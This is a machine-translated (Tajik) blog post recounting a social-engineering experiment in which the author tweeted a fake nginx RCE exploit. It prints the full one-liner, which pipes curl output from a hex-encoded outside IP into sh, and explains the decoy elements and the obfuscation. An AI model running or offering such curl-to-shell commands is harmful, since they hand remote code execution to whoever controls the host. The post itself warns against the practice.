Муваффақияти таҷрибаи иҷтимоӣ бо истисмори қалбакии nginx

Шарҳ. тарҷума.: муаллиф ёддошти аслӣ, ки рӯзи 1 июн нашр шуд, тасмим гирифт, ки дар байни онҳое, ки ба амнияти иттилоотӣ таваҷҷӯҳ доранд, озмоиш гузаронад. Барои ин, ӯ як эксплоити қалбакӣ барои осебпазирии номаълум дар веб-сервер омода кард ва онро дар Твиттераш нашр кард. Тахминҳои ӯ - бояд фавран аз ҷониби мутахассисоне фош карда шаванд, ки фиреби ошкорро дар код мебинанд - на танҳо иҷро шуданд ... Онҳо аз ҳама интизориҳо зиёдтар буданд ва дар самти муқобил: твит аз ҷониби одамони сершумор дастгирӣ ёфт. мазмуни онро тафтиш кунед.

TL; DR: Дар ҳеҷ ваҷҳ лӯлаи файлро дар sh ё bash истифода набаред. Ин як роҳи олии аз даст додани назорати компютери шумост.

Ман мехоҳам бо шумо як ҳикояи кӯтоҳеро дар бораи истисмори комиксҳои PoC, ки 31 май сохта шудааст, мубодила кунам. Вай фавран дар посух ба хабарҳои аз Алиса Эсаж Шевченко, аъзо Ташаббуси рӯзи сифр (ZDI), ки маълумот дар бораи осебпазирӣ дар NGINX, ки ба RCE (иҷроиши коди дурдаст) оварда мерасонад, ба зудӣ ошкор хоҳад шуд. Азбаски NGINX ба бисёр вебсайтҳо қудрат медиҳад, ин хабар бояд як бомба бошад. Аммо аз сабаби таъхир дар раванди "ифшои масъулият", ҷузъиёти ҳодиса маълум набуд - ин тартиби стандартии ZDI аст.

Твит кунед дар бораи ифшои осебпазирӣ дар NGINX

Пас аз анҷом додани кор дар як техникаи нави печида дар curl, ман аз твитҳои аслӣ иқтибос овардам ва "як PoC-и корӣ"-ро, ки аз як сатри код иборат аст, гӯё осебпазирии кашфшударо истифода мебарад, ифшо кардам. Албатта, ин гапи тамоман бемаънӣ буд. Ман гумон мекардам, ки ман фавран фош мешавам ва дар беҳтарин ҳолат ман якчанд ретвит мегирам (оё хуб).

Твит кунед бо истисмори қалбакӣ

Бо вуҷуди ин, ман тасаввур карда наметавонистам, ки баъд чӣ шуд. Маъруфияти твитҳои ман хеле баланд шуд. Тааҷҷубовар аст, ки дар айни замон (15:00 ба вақти Маскав 1 июн) чанд нафар дарк кардаанд, ки ин қалбакӣ аст. Бисёр одамон онро бе тафтиши он retweet мекунанд (бигзор ба ҳайрат овардани графикаи зебои ASCII, ки аз он мебарорад).

Танҳо бубинед, ки чӣ қадар зебост!

Гарчанде ки ҳамаи ин ҳалқаҳо ва рангҳо бузурганд, маълум аст, ки одамон бояд барои дидани онҳо кодро дар мошини худ иҷро кунанд. Хушбахтона, браузерҳо ҳамин тавр кор мекунанд ва дар якҷоягӣ бо он, ки ман аслан намехостам ба мушкилоти ҳуқуқӣ дучор шавам, коди дар сайти ман дафншуда бе кӯшиши насб кардан ё иҷро кардани ягон рамзи иловагӣ танҳо зангҳои эхо мекард.

Мушкилоти хурд: netspooky, днз, ман ва дигар бачахои команда Thugcrowd Муддате мо бо роҳҳои гуногуни печида кардани фармонҳои curl бозӣ мекардем, зеро ин сард аст... ва мо гек ҳастем. netspooky ва dnz якчанд усулҳои наверо кашф карданд, ки ба ман хеле умедбахш менамуданд. Ман ба фароғат ҳамроҳ шудам ва кӯшиш кардам, ки ба халтаи ҳилаҳо табдили даҳии IP илова кунам. Маълум мешавад, ки IP низ метавонад ба формати шонздаҳӣ табдил дода шавад. Гузашта аз ин, curl ва аксари дигар асбобҳои NIX бо хушнудӣ IP-ҳои шонздаҳӣ мехӯранд! Ҳамин тавр, он танҳо як масъалаи эҷоди як хати фармони боварибахш ва бехатар буд. Дар ниҳоят ман дар ин бора қарор гирифтам:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Муҳандисии иҷтимоӣ-электронӣ (SEE) - на танҳо фишинг

Бехатарӣ ва ошноӣ қисми асосии ин озмоиш буданд. Ман фикр мекунам, ки онҳо ба муваффақияти ӯ оварда расониданд. Сатри фармон ба таври возеҳ амниятро бо истинод ба "127.0.0.1" (хости маъруфи маҳаллӣ) дар назар дошт. Localhost бехатар ҳисобида мешавад ва маълумот дар он ҳеҷ гоҳ компютери шуморо тарк намекунад.

Шиносӣ ҷузъи дуюми калидии SEE дар таҷриба буд. Азбаски аудиторияи мақсаднок асосан аз одамоне иборат буд, ки бо асосҳои амнияти компютерӣ ошно буданд, эҷод кардани код муҳим буд, то ки қисмҳои он шинос ва шинос (ва аз ин рӯ бехатар) ба назар расад. Гирифтани унсурҳои консепсияҳои кӯҳнаи истисмор ва ба таври ғайриоддӣ муттаҳид кардани онҳо хеле муваффақ буд.

Дар зер таҳлили муфассали як-лайнер аст. Ҳама чиз дар ин рӯйхат пӯшида мешавад табиати косметикӣ, ва барои кори хакикии он амалан чизе талаб карда намешавад.

Кадом ҷузъҳо воқеан заруранд? Ин -gsS, -O 0x0238f06a, |sh ва худи сервери веб. Веб-сервер ягон дастури зараровар надошт, балки танҳо бо истифода аз фармонҳо ба графикаи ASCII хизмат мекард echo дар скрипт, ки дар index.html. Вақте ки корбар як сатри бо |sh дар байн, index.html бор карда, ичро карда шудааст. Хушбахтона, нигаҳбонони веб-сервер ягон нияти бад надоштанд.

• ../../../%00 — аз доираи директория берун рафтанро ифода мекунад;
• ngx_stream_module.so — роҳ ба модули тасодуфии NGINX;
• /bin/sh%00<'protocol:TCP' — гуё мо ба кор андохта истодаем /bin/sh дар мошини мавриди ҳадаф ва масири баромадро ба канали TCP;
• -O 0x0238f06a#PLToffset - компоненти махфӣ, иловашуда #PLToffset, ба назар мисли ҷуброн хотираи гӯё дар PLT мавҷуд аст;
• |sh; - боз як порчаи муҳим. Ба мо лозим буд, ки баромадро ба sh/bash равона кунем, то коди аз веб-сервери ҳамлакунанда воқеъ дар он ҷойгиршуда иҷро шавад. 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - dummy, ки дар он netcat ишора мекунад /dev/tcp/localhostто ки ҳама чиз боз бехатар ба назар расад. Дар асл, он ҳеҷ кор намекунад ва ба хати зебоӣ дохил карда шудааст.

Бо ин рамзкушоии скрипти яксатрӣ ва муҳокимаи ҷанбаҳои "муҳандисии иҷтимоӣ-электронӣ" (фишингҳои мураккаб) анҷом меёбад.

Конфигуратсияи сервери веб ва чораҳо

Азбаски аксарияти муштариёни ман infosec/хакерҳо ҳастанд, ман тасмим гирифтам, ки веб-серверро ба ифодаҳои "манфиат"-и онҳо каме тобовартар кунам, то бачаҳо коре дошта бошанд (ва ин шавқовар хоҳад буд ташкил кардан). Ман дар ин ҷо ҳама хатогиҳоро номбар намекунам, зеро таҷриба то ҳол идома дорад, аммо инҳоянд чанд коре, ки сервер мекунад:

• Кӯшишҳои паҳнкуниро дар баъзе шабакаҳои иҷтимоӣ фаъолона назорат мекунад ва эскизҳои гуногуни пешнамоишро иваз мекунад, то корбарро барои клик кардани истинод ҳавасманд кунад.
• Ба ҷои нишон додани скрипти ҷилди Chrome/Mozilla/Safari/etc ба видеои таблиғотии Thugcrowd масир мегардонад.
• Аломатҳои возеҳ аз ҳамла/хакерии ошкоро тамошо карда, сипас ба масир равона кардани дархостҳо ба серверҳои NSA оғоз мекунад (га!).
• Троян ва инчунин rootkit BIOS-ро дар ҳама компютерҳое, ки корбаронашон аз браузери муқаррарӣ ба ҳост ташриф меоранд, насб мекунад (шӯхӣ!).

Як қисми ками антимерҳо

Дар ин ҳолат, ҳадафи ягонаи ман азхуд кардани баъзе хусусиятҳои Apache буд, аз ҷумла, қоидаҳои ҷолиби масир барои дархостҳо - ва ман фикр кардам: чаро не?

NGINX Exploit (воқеӣ!)

Обуна ба @alisaesage дар Twitter ва кори бузурги ZDI-ро дар ҳалли осебпазириҳои воқеӣ ва истифодаи имкониятҳо дар NGINX пайгирӣ кунед. Кори онҳо ҳамеша маро ба ваҷд меовард ва ман аз Алис барои сабру таҳаммулаш бо ҳама зикрҳо ва огоҳиҳое, ки твитҳои аблаҳии ман овардааст, миннатдорам. Хушбахтона, он инчунин як чизи хубе кард: он ба баланд бардоштани огоҳӣ дар бораи осебпазирии NGINX ва инчунин мушкилоте, ки аз сӯиистифода аз curl ба вуҷуд омадааст, кӯмак кард.

Манбаъ: will.com